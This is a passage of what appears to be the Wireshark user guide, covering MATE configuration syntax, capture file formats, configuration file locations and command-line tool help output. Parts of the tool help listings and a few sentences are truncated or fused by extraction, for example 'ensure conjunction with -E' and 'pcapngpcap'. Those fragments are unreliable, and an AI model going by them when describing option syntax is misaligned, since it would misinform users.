AVPL. Such modification may be an Insert (merge) or a Replace. The syntax is as follows: Transform name { Match [Strict|Every|Loose] match_avpl [[Insert|Replace] modify_avpl] ; // may occur multiple times, at least once }; For examples of Transforms, check the Manual page. TODO: migrate the examples here? The list of Match rules inside a Transform is processed top to bottom; the processing ends as soon as either a Match rule succeeds or all have been tried in vain. Transforms can be used as helpers to manipulate an item’s AVPL before the item is processed further. An item declaration may contain a Transform clause indicating a list of previously declared Transforms. Regardless whether the individual transforms succeed or fail, the list is always executed completely and in the order given, i.e. left to right. In MATE configuration file, a Transform must be declared before declaring any item which uses it. The following configuration AVPLs deal with PDU creation and data extraction. In each frame of the capture, MATE will look for source proto_name's PDUs in the order in which the declarations appear in its configuration and will create Pdus of every type it can from that frame, unless specifically instructed that some Pdu type is the last one to be looked for in the frame. If told so for a given type, MATE will extract all Pdus of that type and the previously declared types it finds in the frame but not those declared later. The complete declaration of a Pdu looks as below; the mandatory order of the diverse clauses is as shown. Pdu name Proto proto_name Transport proto1[/proto2/proto3[/...]]] { Payload proto; //optional, no default value Extract attribute From proto.field ; //may occur multiple times, at least once Transform (transform1[, transform2[, ...]]); //optional Criteria [{Accept|Reject}] [{Strict|Every|Loose} match_avpl]; DropUnassigned {true|false}; //optional, default=false DiscardPduData {true|false}; //optional, default=false LastExtracted {true|false}; //optional, default=false }; The name is a mandatory attribute of a Pdu Pdu which MATE creates. However, several Pdu declarations may share the same name. In such case, all of them are created from each source PDU matching their Proto, Transport, and Payload clauses, while the bodies of their declarations may be totally different from each other. Together with the Accept (or Reject) clauses, this feature is useful when it is necessary to build the Pdu’s AVPL from different sets of source fields depending on contents (or mere presence) of other source fields. Every instance of the protocol proto_name PDU in a frame will generate one Pdu with the AVPs extracted from fields that are in the proto_name's range and/or the ranges of underlying protocols specified by the Transport list. It is a mandatory attribute of a Pdu declaration. The proto_name is the name of the protocol as used in Wireshark display filter. The Pdu’s Proto, and its Transport list of protocols separated by / tell MATE which fields of a frame can get into the Pdu’s AVPL. In order that MATE would extract an attribute from a frame’s protocol tree, the area representing the field in the hex display of the frame must be within the area of either the Proto or it’s relative Transport s. Transport s are chosen moving backwards from the protocol area, in the order they are given. Proto http Transport tcp/ip does what you’d expect it to - it selects the nearest tcp range that precedes the current http range, and the nearest ip range that precedes that tcp range. If there is another ip range before the nearest one (e.g. in case of IP tunneling), that one is not going to be selected. Transport tcp/ip/ip that "logically" should select the encapsulating IP header too doesn’t work so far. Once we’ve selected the Proto and Transport ranges, MATE will fetch those protocol fields belonging to them whose extraction is declared using the Extract clauses for the Pdu type. The Transport list is also mandatory, if you actually don’t want to use any transport protocol, use Transport mate. (This didn’t work until 0.10.9). Other than the Pdu’s Proto and its Transport protocols, there is also a Payload attribute to tell MATE from which ranges of Proto's payload to extract fields of a frame into the Pdu. In order to extract an attribute from a frame’s tree the highlighted area of the field in the hex display must be within the area of the Proto's relative payload(s). Payload s are chosen moving forward from the protocol area, in the order they are given. Proto http Transport tcp/ip Payload mmse will select the first mmse range after the current http range. Once we’ve selected the Payload ranges, MATE will fetch those protocol fields belonging to them whose extraction is declared using the Extract clauses for the Pdu type. Each Extract clause tells MATE which protocol field value to extract as an AVP value and what string to use as the AVP name. The protocol fields are referred to using the names used in Wireshark display filters. If there is more than one such protocol field in the frame, each instance that fulfills the criteria stated above is extracted into its own AVP. The AVP names may be chosen arbitrarily, but to be able to match values originally coming from different Pdus (e.g., hostname from DNS query and a hostname from HTTP GET request) later in the analysis, identical AVP names must be assigned to them and the dissectors must provide the field values in identical format (which is not always the case). The Transform clause specifies a list of previously declared Transform s to be performed on the Pdu’s AVPL after all protocol fields have been extracted to it. The list is always executed completely, left to right. On the contrary, the list of Match clauses inside each individual Transform is executed only until the first match succeeds. This clause tells MATE whether to use the Pdu for analysis. It specifies a match AVPL, an AVPL match type (Strict, Every, or Loose) and the action to be performed (Accept or Reject) if the match succeeds. Once every attribute has been extracted and eventual transform list has been executed, and if the Criteria clause is present, the Pdu’s AVPL is matched against the match AVPL; if the match succeeds, the action specified is executed, i.e. the Pdu is accepted or rejected. The default behaviours used if the respective keywords are omitted are Strict and Accept. Accordingly, if the clause is omitted, all Pdus are accepted. If set to TRUE, MATE will destroy the Pdu if it cannot assign it to a Gop. If set to FALSE (the default if not given), MATE will keep them. If set to TRUE, MATE will delete the Pdu’s AVPL once it has analyzed it and eventually extracted some AVPs from it into the Gop’s AVPL. This is useful to save memory (of which MATE uses a lot). If set to FALSE (the default if not given), MATE will keep the Pdu attributes. Declares a Gop type and its prematch candidate key. Gop name On pduname Match key { Start match_avpl; // optional Stop match_avpl; // optional Extra match_avpl; // optional Transform transform_list; // optional Expiration time; // optional IdleTimeout time; // optional Lifetime time; // optional DropUnassigned [TRUE|FALSE]; //optional ShowTree [NoTree|PduTree|FrameTree|BasicTree]; //optional ShowTimes [TRUE|FALSE]; //optional, default TRUE }; The name is a mandatory attribute of a Gop. The name of Pdus which this type of Gop is supposed to be groupping. It is mandatory. Defines what AVPs form up the key part of the Gop’s AVPL (the Gop’s key AVPL or simply the Gop’s key). All Pdus matching the key AVPL of an active Gop are assigned to that Gop; a Pdu which contains the AVPs whose attribute names are listed in the Gop’s key AVPL, but they do not strictly match any active Gop’s key AVPL, will create a new Gop (unless a Start clause is given). When a Gop is created, the elements of its key AVPL are copied from the creating Pdu. If given, it tells MATE what match_avpl must a Pdu’s AVPL match, in addition to matching the Gop’s key, in order to start a Gop. If not given, any Pdu whose AVPL matches the Gop’s key AVPL will act as a start for a Gop. The Pdu’s AVPs matching the match_avpl are not automatically copied into the Gop’s AVPL. If given, it tells MATE what match_avpl must a Pdu’s AVPL match, in addition to matching the Gop’s key, in order to stop a Gop. If omitted, the Gop is "auto-stopped" - that is, the Gop is marked as stopped as soon as it is created. The Pdu’s AVPs matching the match_avpl are not automatically copied into the Gop’s AVPL. If given, tells MATE which AVPs from the Pdu’s AVPL are to be copied into the Gop’s AVPL in addition to the Gop’s key. The Transform clause specifies a list of previously declared Transform s to be performed on the Gop’s AVPL after the AVPs from each new Pdu, specified by the key AVPL and the Extra clause’s match_avpl, have been merged into it. The list is always executed completely, left to right. On the contrary, the list of Match clauses inside each individual Transform is executed only until the first match succeeds. A (floating) number of seconds after a Gop is Stop ped during which further Pdus matching the Stop ped Gop’s key but not the Start condition will still be assigned to that Gop. The default value of zero has an actual meaning of infinity, as it disables this timer, so all Pdus matching the Stop ped Gop’s key will be assigned to that Gop unless they match the Start condition. A (floating) number of seconds elapsed from the last Pdu assigned to the Gop after which the Gop will be considered released. The default value of zero has an actual meaning of infinity, as it disables this timer, so the Gop won’t be released even if no Pdus arrive - unless the Lifetime timer expires. A (floating) of seconds after the Gop Start after which the Gop will be considered released regardless anything else. The default value of zero has an actual meaning of infinity. Whether or not a Gop that has not being assigned to any Gog should be discarded. If TRUE, the Gop is discarded right after creation. If FALSE, the default, the unassigned Gop is kept. Setting it to TRUE helps save memory and speed up filtering. Controls the display of Pdus subtree of the Gop: Declares a Gog type and its prematch candidate key. Gog name { Member gopname (key); // mandatory, at least one Extra match_avpl; // optional Transform transform_list; // optional Expiration time; // optional, default 2.0 GopTree [NoTree|PduTree|FrameTree|BasicTree]; // optional ShowTimes [TRUE|FALSE]; // optional, default TRUE }; The name is a mandatory attribute of a Gog. Defines the key AVPL for the Gog individually for each Gop type gopname. All gopname type Gops whose key AVPL matches the corresponding key AVPL of an active Gog are assigned to that Gog; a Gop which contains the AVPs whose attribute names are listed in the Gog’s corresponding key AVPL, but they do not strictly match any active Gog’s key AVPL, will create a new Gog. When a Gog is created, the elements of its key AVPL are copied from the creating Gop. Although the key AVPLs are specified separately for each of the Member gopname s, in most cases they are identical, as the very purpose of a Gog is to group together Gops made of Pdus of different types. If given, tells MATE which AVPs from any of the Gop’s AVPL are to be copied into the Gog’s AVPL in addition to the Gog’s key. A (floating) number of seconds after all the Gops assigned to a Gog have been released during which new Gops matching any of the session keys should still be assigned to the existing Gog instead of creating a new one. Its value can range from 0.0 to infinite. Defaults to 2.0 seconds. The Transform clause specifies a list of previously declared Transform s to be performed on the Gog’s AVPL after the AVPs from each new Gop, specified by the key AVPL and the Extra clause’s match_avpl, have been merged into it. The list is always executed completely, left to right. On the contrary, the list of Match clauses inside each individual Transform is executed only until the first match succeeds. Controls the display of Gops subtree of the Gog: The Settings config element is used to pass to MATE various operational parameters. the possible parameters are How long in seconds after all the gops assigned to a gog have been released new gops matching any of the session keys should create a new gog instead of being assigned to the previous one. Its value can range from 0.0 to infinite. Defaults to 2.0 seconds. Whether or not the AVPL of every Pdu should be deleted after it was being processed (saves memory). It can be either TRUE or FALSE. Defaults to TRUE. Setting it to FALSE can save you from a headache if your config does not work. Whether Pdus should be deleted if they are not assigned to any Gop. It can be either TRUE or FALSE. Defaults to FALSE. Set it to TRUE to save memory if unassigned Pdus are useless. Whether GoPs should be deleted if they are not assigned to any session. It can be either TRUE or FALSE. Defaults to FALSE. Setting it to TRUE saves memory. The following settings are used to debug MATE and its configuration. All levels are integers ranging from 0 (print only errors) to 9 (flood me with junk), defaulting to 0. Debug { Filename "path/name"; //optional, no default value Level [0-9]; //optional, generic debug level Pdu Level [0-9]; //optional, specific debug level for Pdu handling Gop Level [0-9]; //optional, specific debug level for Gop handling Gog Level [0-9]; //optional, specific debug level for Gog handling }; The {{{path/name}}} is a full path to the file to which debug output is to be written. Non-existent file will be created, existing file will be overwritten at each opening of a capture file. If the statement is missing, debug messages are written to console, which means they are invisible on Windows. Sets the level of debugging for generic debug messages. It is an integer ranging from 0 (print only errors) to 9 (flood me with junk). Sets the level of debugging for messages regarding Pdu creation. It is an integer ranging from 0 (print only errors) to 9 (flood me with junk). Sets the level of debugging for messages regarding Pdu analysis (that is how do they fit into ?GoPs). It is an integer ranging from 0 (print only errors) to 9 (flood me with junk). Sets the level of debugging for messages regarding GoP analysis (that is how do they fit into ?GoGs). It is an integer ranging from 0 (print only errors) to 9 (flood me with junk). Will include a file to the configuration. Action=Include; {Filename=filename;|Lib=libname;} The filename of the file to include. If it does not begin with '/' it will look for the file in the current path. The name of the lib config to include. will look for libname.mate in wiresharks_dir/matelib. Table of Contents Wireshark provides you with additional information generated out of the plain packet data or it may need to indicate dissection problems. Messages generated by Wireshark are usually placed in square brackets (“[]”). These messages might appear in the packet list. Malformed packet means that the protocol dissector can’t dissect the contents of the packet any further. There can be various reasons:. These messages might appear in the packet details. The current packet is the request of a detected request/response pair. You can directly jump to the corresponding response packet by double clicking on the message. Table of Contents To understand which information will remain available after the captured packets are saved to a capture file, it’s helpful to know a bit about the capture file contents. Wireshark uses the pcapng file format as the default format to save captured packets. It is very flexible but other tools may not support it. Wireshark also supports the libpcap file format. This is a much simpler format and is well established. However, it has some drawbacks: it’s not extensible and lacks some information that would be really helpful (e.g. being able to add a comment to a packet such as “the problems start here” would be really nice). In addition to the libpcap format, Wireshark supports several different capture file formats. However, the problems described above also applies for these formats. At the start of each libpcap capture file some basic information is stored like a magic number to identify the libpcap file format. The most interesting information of this file start is the link layer type (Ethernet, 802.11, MPLS, etc). The following data is saved for each packet: A detailed description of the libpcap file format can be found at You should also know the things that are not saved in capture files: Name resolution information. See Section 7.9, “Name Resolution” for details Pcapng files can optionally save name resolution information. Libpcap files can’t. Other file formats have varying levels of support. To match the different policies for Unix-like systems and Windows, and different policies used on different Unix-like systems, the folders containing configuration files and plugins are different on different platforms. We indicate the location of the top-level folders under which configuration files and plugins are stored here, giving them placeholder names independent of their actual location, and use those names later when giving the location of the folders for configuration files and plugins. %APPDATA% is the personal application data folder, e.g.: C:\Users\username\AppData\Roaming\Wireshark (details can be found at: Section B.5.1, “Windows profiles”). WIRESHARK is the Wireshark program folder, e.g.: C:\Program Files\Wireshark. $XDG_CONFIG_HOME is the folder for user-specific configuration files. It’s usually $HOME/.config, where $HOME is the user’s home folder, which is usually something such as /home/username, or /Users/username on macOS. If you are using macOS and you are running a copy of Wireshark installed as an application bundle, APPDIR is the top-level directory of the Wireshark application bundle, which will typically be /Applications/Wireshark.app. Otherwise, INSTALLDIR is the top-level directory under which reside the subdirectories in which components of Wireshark are installed. This will typically be /usr if Wireshark is bundled with the system (for example, provided as a package with a Linux distribution) and /usr/local if, for example, you’ve build Wireshark from source and installed it. Wireshark uses a number of configuration files while it is running. Some of these reside in the personal configuration folder and are used to maintain information between runs of Wireshark, while some of them are maintained in system areas. The content format of the configuration files is the same on all platforms. On Windows: On Unix-like systems: This file contains all the capture filters that you have defined and saved. It consists of one or more lines, where each line has the following format: "<filter name>" <filter string> At program start, if there is a cfilters file in the personal configuration folder, it is read. If there isn’t a cfilters file in the personal configuration folder, then, if there is a cfilters file in the global configuration folder, it is read. When you press the Save button in the “Capture Filters” dialog box, all the current capture filters are written to the personal capture filters file. This file contains all the color filters that you have defined and saved. It consists of one or more lines, where each line has the following format: @<filter name>@<filter string>@[<bg RGB(16-bit)>][<fg RGB(16-bit)>] At program start, if there is a colorfilters file in the personal configuration folder, it is read. If there isn’t a colorfilters file in the personal configuration folder, then, if there is a colorfilters file in the global configuration folder, it is read. When you press the Save button in the “Coloring Rules” dialog box, all the current color filters are written to the personal color filters file. This file contains all the display filter buttons that you have defined and saved. It consists of one or more lines, where each line has the following format: "TRUE/FALSE","<button label>","<filter string>","<comment string>" where the first field is TRUE if the button is enabled (shown). At program start, if there is a dfilter_buttons file in the personal configuration folder, it is read. If there isn’t a dfilter_buttons file in the personal configuration folder, then, if there is a dfilter_buttons file in the global configuration folder, it is read. When you save any changes to the filter buttons, all the current display filter buttons are written to the personal display filter buttons file. This file contains all the display filter macros that you have defined and saved. It consists of one or more lines, where each line has the following format: "<macro name>" <filter string> At program start, if there is a dfilter_macros file in the personal configuration folder, it is read. If there isn’t a dfilter_macros file in the personal configuration folder, then, if there is a dfilter_macros file in the global configuration folder, it is read. When you press the Save button in the "Display Filter Macros" dialog box, all the current display filter macros are written to the personal display filter macros file. More information about Display Filter Macros is available in Section 11.8, “Display Filter Macros” This file contains all the display filters that you have defined and saved. It consists of one or more lines, where each line has the following format: "<filter name>" <filter string> At program start, if there is a dfilters file in the personal configuration folder, it is read. If there isn’t a dfilters file in the personal configuration folder, then, if there is a dfilters file in the global configuration folder, it is read. When you press the Save button in the “Display Filters” dialog box, all the current display filters are written to the personal display filters file. Each line in this file specifies a disabled protocol name. The following are some examples: tcp udp At program start, if there is a disabled_protos file in the global configuration folder, it is read first. Then, if there is a disabled_protos file in the personal configuration folder, that is read; if there is an entry for a protocol set in both files, the setting in the personal disabled protocols file overrides the setting in the global disabled protocols file. When you press the Save button in the “Enabled Protocols” dialog box, the current set of disabled protocols is written to the personal disabled protocols file. When Wireshark is trying to translate an hardware MAC address to a name, it consults the ethers file in the personal configuration folder first. If the address is not found in that file, Wireshark consults the ethers file in the system configuration folder. This file has the same format as the /etc/ethers file on some Unix-like systems. Each line in these files consists of one hardware address and name separated by whitespace. The digits of hardware addresses are separated by colons (:), dashes (-) or periods(.). The following are some examples: ff-ff-ff-ff-ff-ff Broadcast c0-00-ff-ff-ff-ff TR_broadcast 00.2b.08.93.4b.a1 Freds_machine The settings from this file are read in when a MAC address is to be translated to a name, and never written by Wireshark. Wireshark uses the entries in the hosts files to translate IPv4 and IPv6 addresses into names. At program start, if there is a hosts file in the global configuration folder, it is read first. Then, if there is a hosts file in the personal configuration folder, that is read; if there is an entry for a given IP address in both files, the setting in the personal hosts file overrides the entry in the global hosts file. This file has the same format as the usual /etc/hosts file on Unix systems. An example is: # Comments must be prepended by the # sign! 192.168.0.1 homeserver The settings from this file are read in at program start and never written by Wireshark. When Wireshark is trying to translate an IPX network number to a name, it consults the ipxnets file in the personal configuration folder first. If the address is not found in that file, Wireshark consults the ipxnets file in the system configuration folder. An example is: C0.A8.2C.00 HR c0-a8-1c-00 CEO 00:00:BE:EF IT_Server1 110f FileServer3 The settings from this file are read in when an IPX network number is to be translated to a name, and never written by Wireshark. At program start, if there is a manuf file in the global configuration folder, it is read. The entries in this file are used to translate MAC address prefixes into short and long manufacturer names. Each line consists of a MAC address prefix followed by an abbreviated manufacturer name and the full manufacturer name. Prefixes 24 bits long by default and may be followed by an optional length. Note that this is not the same format as the ethers file. Examples are: 00:00:01 Xerox Xerox Corporation 00:50:C2:00:30:00/36 Microsof Microsoft The settings from this file are read in at program start and never written by Wireshark. This file contains your Wireshark preferences, including defaults for capturing and displaying packets. It is a simple text file containing statements of the form: variable: value At program start, if there is a preferences file in the global configuration folder, it is read first. Then, if there is a preferences file in the personal configuration folder, that is read; if there is a preference set in both files, the setting in the personal preferences file overrides the setting in the global preference file. If you press the Save button in the “Preferences” dialog box, all the current settings are written to the personal preferences file. This file contains GUI settings that are specific to the current profile, such as column widths and toolbar visibility. It is a simple text file containing statements of the form: variable: value It is read at program start and written when preferences are saved and at program exit. It is also written and read whenever you switch to a different profile. This file contains common GUI settings, such as recently opened capture files, recently used filters, and window geometries. It is a simple text file containing statements of the form: variable: value It is read at program start and written when preferences are saved and at program exit. Wireshark uses the services files to translate port numbers into names. At program start, if there is a services file in the global configuration folder, it is read first. Then, if there is a services file in the personal configuration folder, that is read; if there is an entry for a given port number in both files, the setting in the personal hosts file overrides the entry in the global hosts file. An example is: mydns 5045/udp # My own Domain Name Server mydns 5045/tcp # My own Domain Name Server The settings from these files are read in at program start and never written by Wireshark. Wireshark uses the ss7pcs file to translate SS7 point codes to node names. At program start, if there is a ss7pcs file in the personal configuration folder, it is read. Each line in this file consists of one network indicator followed by a dash followed by a point code in decimal and a node name separated by whitespace or tab. An example is: 2-1234 MyPointCode1 The settings from this file are read in at program start and never written by Wireshark. Wireshark uses the subnets files to translate an IPv4 address into a subnet name. If no exact match from a hosts file or from DNS is found, Wireshark will attempt a partial match for the subnet of the address. At program start, if there is a subnets file in the personal configuration folder, it is read first. Then, if there is a subnets file in the global configuration folder, that is read; if there is a preference set in both files, the setting in the global preferences file overrides the setting in the personal preference file. Each line in one of these files”. The settings from these files are read in at program start and never written by Wireshark. Wireshark uses the vlans file to translate VLAN tag IDs into names. If there is a vlans file in the currently active profile folder, it is used. Otherwise the vlans file in the personal configuration folder is used. Each line in this file consists of one VLAN tag ID and a describing name separated by whitespace or tab. An example is: 123 Server-LAN 2049 HR-Client-LAN The settings from this file are read in at program start or when changing the active profile and are never written by Wireshark. Wireshark supports plugins for various purposes. Plugins can either be scripts written in Lua or code written in C or C++ and compiled to machine code. Wireshark looks for plugins in both a personal plugin folder and a global plugin folder. Lua plugins are stored in the plugin folders; compiled plugins are stored in subfolders of the plugin folders, with the subfolder name being the Wireshark minor version number (X.Y). There is another hierarchical level for each Wireshark plugin type (libwireshark, libwiretap and codecs). So for example the location for a libwireshark plugin foo.so (foo.dll on Windows) would be PLUGINDIR/X.Y/epan (libwireshark used to be called libepan; the other folder names are codecs and wiretap). On Windows: On Unix-like systems: Here you will find some details about the folders used in Wireshark on different Windows versions. As already mentioned, you can find the currently used folders in the “About Wireshark” dialog. Windows uses some special directories to store user configuration files which define the “user profile”. This can be confusing, as the default directory location changed from Windows version to version and might also be different for English and internationalized versions of Windows. The following guides you to the right place where to look for Wireshark’s profile data. Some larger Windows environments use roaming profiles. If this is the case the configurations of all programs you use won’t be saved on your local hard drive. They will be stored on the domain server instead. Your settings will travel with you from computer to computer with one exception. The “Local Settings” folder in your profile data (typically something like: C:\Documents and Settings\username\Local Settings) will not be transferred to the domain server. This is the default for temporary capture files. Wireshark uses the folder which is set by the TMPDIR or TEMP environment variable. This variable will be set by the Windows installer. Wireshark distinguishes between protocols (e.g. tcp) and protocol fields (e.g. tcp.port). A comprehensive list of all protocols and protocol fields can be found in the “Display Filter Reference” at Table of Contents Wireshark comes with an array of command line tools which can be helpful for packet analysis. Some of these tools are described in this chapter. You can find more information about all of Wireshark’s command line tools on the web site. TShark is a terminal oriented version of Wireshark designed for capturing and displaying packets when an interactive user interface isn’t necessary or available. It supports the same options as wireshark. For more information on tshark consult your local manual page ( man tshark) or the online version. Help information available from tshark. TShark (Wireshark) 3.5.0 (v3.5.0rc0-21-gce47866a4337) Dump and analyze network traffic. See for more information. Usage: tshark [options] ... (or '-' for stdin) Processing: -2 perform a two-pass analysis -M <packet count> perform session auto reset -R <read filter>, --read-filter <read filter> packet Read filter in Wireshark display filter syntax (requires -2) -Y <display filter>, --display-filter <display filter> packet displaY -H <hosts file> read a list of entries from a hosts file, which will then be written to a capture file. (Implies -W n) --enable-protocol <proto_name> enable dissection of proto_name --disable-protocol <proto_name> disable dissection of proto_name --enable-heuristic <short_name> enable dissection of heuristic protocol --disable-heuristic <short_name> disable dissection of heuristic protocol Output: -w <outfile|-> write packets to a pcapng-format file named "outfile" (or '-' for stdout) --capture-comment <comment> set the capture file comment, if supported print packet summary even when writing to a file -S <separator> the line separator to print between packets -x add output of hex and ASCII dump (Packet Bytes) -T pdml|ps|psml|json|jsonraw|ek|tabs|text|fields|? format of text output (def: text) -j <protocolfilter> protocols layers filter if -T ek|pdml|json selected (e.g. "ip ip.flags text", filter does not expand child nodes, unless child is specified also in the filter) -J <protocolfilter> top level protocol filter if -T ek|pdml|json selected (e.g. "http tcp", filter which expands all child nodes) -e <field> field to print if -Tfields selected (e.g. tcp.port, _ws.col.Info) this option can be repeated to print multiple fields -E<fieldsoption>=<value> set options for output when -Tfields selected: bom=y|n print a UTF-8 BOM|adoy|d|dd|e|r|u|ud|udoy -U tap_name PDUs export mode, see the man page for details -z <statistics> various statistics, see the man page for details --export-objects <protocol>,<destdir> save exported objects for a protocol to a directory named "destdir" --color color output text similarly to the Wireshark GUI, requires a terminal with 24-bit color support Also supplies color attributes to pdml and psml formats (Note that attributes are nonstandard) --no-duplicate-keys If -T json is specified, merge duplicate keys in an object into a single key with as value a json array containing all values --elastic-mapping-filter <protocols> If -G elastic-mapping is specified, put only the specified protocols within the mapping file Miscellaneous: -h, --help display this help and exit -v, --version display version info and exit -o <name>:<value> ... override preference setting -K <keytab> keytab file to use for kerberos decryption -G [report] dump one of several available reports and exit default report="fields" use "-G help" for more help Dumpcap can benefit from an enabled BPF JIT compiler if available. You might want to enable it by executing: "echo 1 > /proc/sys/net/core/bpf_jit_enable" Note that this can make your system less secure!. For more information on tcpdump consult your local manual page ( man tcpdump) or the online version. Dumpcap is a network traffic dump tool. It captures packet data from a live network and writes the packets to a file. Dumpcap’s native capture file format is pcapng, which is also the format used by Wireshark. By default, Dumpcap uses the pcap library to capture traffic from the first available network interface and writes the received raw packet data, along with the packets’ time stamps into a pcapng file. The capture filter syntax follows the rules of the pcap library. For more information on dumpcap consult your local manual page ( man dumpcap) or the online version. Help information available from dumpcap. Dumpcap (Wireshark) 3.5.0 (v3.5.0rc0-1363-geaf6554aa174) Capture network packets and dump them into a pcapng or pcap file. See for more information. Usage: dumpcap [options] ... Capture interface: -i <interface>, --interface <interface> name or idx of interface (def: first non-loopback), or for remote capturing, use one of these formats: rpcap://<host>/<interface> TCP@<host>:<port> --ifname <name> name to use in the capture file for a pipe from which we're capturing --ifdescr <description> description to use in the capture file for a pipe from which we're capturing in MiB (def: 2MiB) -d print generated BPF code for capture filter -k <freq>,[<type>],[<center_freq1>],[<center_freq2>] set channel on wifi interface -S print statistics for each interface once per second -M for -D, -L, and -S, produce machine-readable output Output (files): -w <filename> name of file to save (def: tempfile) -g enable group read access on the output file(s) -b <ringbuffer opt.> ..., --ring-buffer <ringbuffer opt.> duration:NUM - switch to next file after NUM secs filesize:NUM - switch to next file after NUM kB files:NUM - ringbuffer: replace after NUM files packets:NUM - ringbuffer: replace after NUM packets interval:NUM - switch to next file when the time is an exact multiple of NUM secs printname:FILE - print filename to FILE when written (can use 'stdout' or 'stderr') , --version print version information and exit -h, --help display this help and exit Dumpcap can benefit from an enabled BPF JIT compiler if available. You might want to enable it by executing: "echo 1 > /proc/sys/net/core/bpf_jit_enable" Note that this can make your system less secure! Example: dumpcap -i eth0 -a duration:60 -w output.pcapng "Capture packets from interface eth0 until 60s passed into output.pcapng" Use Ctrl-C to stop capturing at any time. capinfos can print information about capture files including the file type, number of packets, date and time information, and file hashes. Information can be printed in human and machine readable formats. For more information on capinfos consult your local manual page ( man capinfos) or the online version. Help information available from capinfos. Capinfos (Wireshark) 3.5.0 (v3.5.0rc0-21-gce47866a4337)256, RMD160, and SHA) Metadata infos: -n display number of resolved IPv4 and IPv6 addresses -D display number of decryption secrets) -K disable displaying the capture comment Options are processed from left to right order with later options superseding or adding to earlier options. If no options are given the default is to display all infos in long report output format. Rawshark reads a stream of packets from a file or pipe, and prints a line describing its output, followed by a set of matching fields for each packet on stdout. For more information on rawshark consult your local manual page ( man rawshark) or the online version. Help information available from rawshark. Rawshark (Wireshark) 3.5.0 (v3.5.0rc0-21-gce47866a4337) Dump and analyze network traffic. See for more information. Usage: rawshark [options] ... Input file: -r <infile> set the pipe or file name to read from Processing: -d <encap:linktype>|<proto:protoname> packet encapsulation or protocol -F <field> field to display -m virtual memory limit, in bytes -n disable all name resolution (def: all enabled) -N <name resolve flags> enable specific name resolution(s): "mnNtdv" editcap is a general-purpose utility for modifying capture files. Its main function is to remove packets from capture files, but it can also be used to convert capture files from one format to another, as well as to print information about capture files. For more information on editcap consult your local manual page ( man editcap) or the online version. Help information available from editcap. Editcap (Wireshark) 3.5.0 (v3.5.0rc0-663-g9faf6d4e7b67) read packets whose timestamp is after (or equal to) the given time. -B <stop time> only read packets whose timestamp is before the given time. Time format for -A/-B options is YYYY-MM-DDThh:mm:ss[.nnnnnnnnn][Z|+-hh:mm] Unix epoch timestamps are also supported. Duplicate packet removal: --novlan remove vlan info from packets before checking for duplicates. ). NOTE: The use of the 'Duplicate packet removal' options with other editcap options except -v may not always work as expected. Specifically the -r, -t or -S options will very likely NOT have the desired effect if combined with the -d, -D or -w. --skip-radiotap-header skip radiotap header when checking for packet duplicates. Useful when processing packets captured by multiple radios on the same channel in the vicinity of each other. ensure conjunction with -E, skip some bytes from the beginning of the packet. This allows one to preserve some bytes, in order to have some headers untouched. --seed <seed> When used in conjunction with -E, set the seed to use for the pseudo-random number generator. This allows one to repeat a particular sequence of errors. )). -a <framenum>:<comment> Add or replace comment for given frame number. --inject-secrets <type>,<file> Insert decryption secrets from <file>. List supported secret types with "--inject-secrets help". --discard-all-secrets Discard all decryption secrets from the input file when writing the output file. Does not discard secrets added by "--inject-secrets" in the same command line. --capture-comment <comment> Add a capture file comment, if supported. --discard-capture-comment Discard capture file comments from the input file when writing the output file. Does not discard comments added by "--capture-comment" in the same command line. Miscellaneous: -h display this help and exit. -v verbose output. If -v is used with any of the 'Duplicate Packet Removal' options (-d, -D or -w) then Packet lengths and MD5 hashes are printed to standard-error. -V, --version print version information and exit. Capture file types available from editcap -F. editcap: The available capture file types for the "-F" flag are: pcap - Wireshark/tcpdump/... - pcap pcapng - Wireshark/... - pcapngpcap - Modified tcpdump - p) observer - Viavi Observer Encapsulation types available from editcap docsis31_xra31 - DOCSIS with Excentis XRA pseudo-header dpauxmon - DisplayPort AUX channel with Unigraf pseudo-header dpnss_link - Digital Private Signalling System No 1 Link Layer dvbci - DVB-CI (Common Interface) ebhscr - Elektrobit High Speed Capture and Replay enc - OpenBSD enc(4) encapsulating interface epon - Ethernet Passive Optical Network erf - Extensible Record Format ether - Ethernet ether-mpacket - IEEE 802.3br mPackets ether-nettl - Ethernet with nettl headers etw - Event Tracing for Windows messagesfp-f - ITU-T G.7041/Y.1303 Generic Framing Procedure Frame-mapped mode gfp-t - ITU-T G.7041/Y.1303 Generic Framing Procedure Transparent mode gprs-llc - GPRS LLC gsm_um - GSM Um Interface hhdlc - HiPath HDLC i2c-linux - I2C with Linux-specific pseudo-header ieee-802-11 - IEEE 802.11 Wireless LAN-ib - IP over IB ip-over-fc - RFC 2625 IP-over-Fibre Channel ip-over-ib - IP over InfiniBand ipfix - RFC 5655/RFC 5101 IPFIX ipmb-kontron - Intelligent Platform Management Bus with Kontron pseudo-header ipmi-trace - IPMI Trace Data Collection ipnet - Solaris IPNET irda - IrDA isdn - ISDN iso14443 - ISO 14443 contactless smartcard standards-st - Juniper Secure Tunnel Information juniper-svcs - Juniper Services juniper-vn - Juniper VN v1 linux-sll2 - Linux cooked-mode capture v2 log_3GPP - 3GPP Phone Logoratap - LoRaTap ltalk - Localtalk message_analyzer_wfp_capture2_v4 - Message Analyzer WFP Capture2 v4 message_analyzer_wfp_capture2_v6 - Message Analyzer WFP Capture2 v6 message_analyzer_wfp_capture_auth_v4 - Message Analyzer WFP Capture Auth v4 message_analyzer_wfp_capture_auth_v6 - Message Analyzer WFP Capture Auth v6 message_analyzer_wfp_capture_v4 - Message Analyzer WFP Capture v4 message_analyzer_wfp_capture_v6 - Message Analyzer WFP Capture v6 mime - MIME most - Media Oriented Systems Transport mp2ts - ISO/IEC 13818-1 MPEG2-TS mp4 - MP4 files mpeg - MPEG mtp2 - SS7 MTP2 mtp2-with-phdr - MTP2 with pseudoheader mtp3 - SS7 MTP3 mux27010 - MUX27010 netanalyzer - Hilscher netANALYZER netanalyzer-transparent - Hilscher netANALYZER-Transparent netlink - Linux Netlink netmon_event - Network Monitor Network Event netmon_filter - Network Monitor Filter netmon_header - Network Monitor Header netmon_network_info - Network Monitor Network Info nfc-llcp - NFC LLCP nflog - NFLOG nordic_ble - Nordic BLE Sniffer - Apple Bluetoothfc7468 - RFC 7468 file rtac-serial - RTAC serial-line ruby_marshal - Ruby marshal object s4607 - STANAG 4607 s5066-dpdu - STANAG 5066 Data Transfer Sublayer PDUs(D_PDU) sccp - SS7 SCCP sctp - SCTP sdh - SDH sdjournal - systemd journal-20 - USB 2.0/1.1/1.0 packets usb-darwin - USB packets with Darwin (macOS, etc.) headers usb-freebsd - USB packets with FreeBSD header vpp - Vector Packet Processing graph dispatch trace vsock - 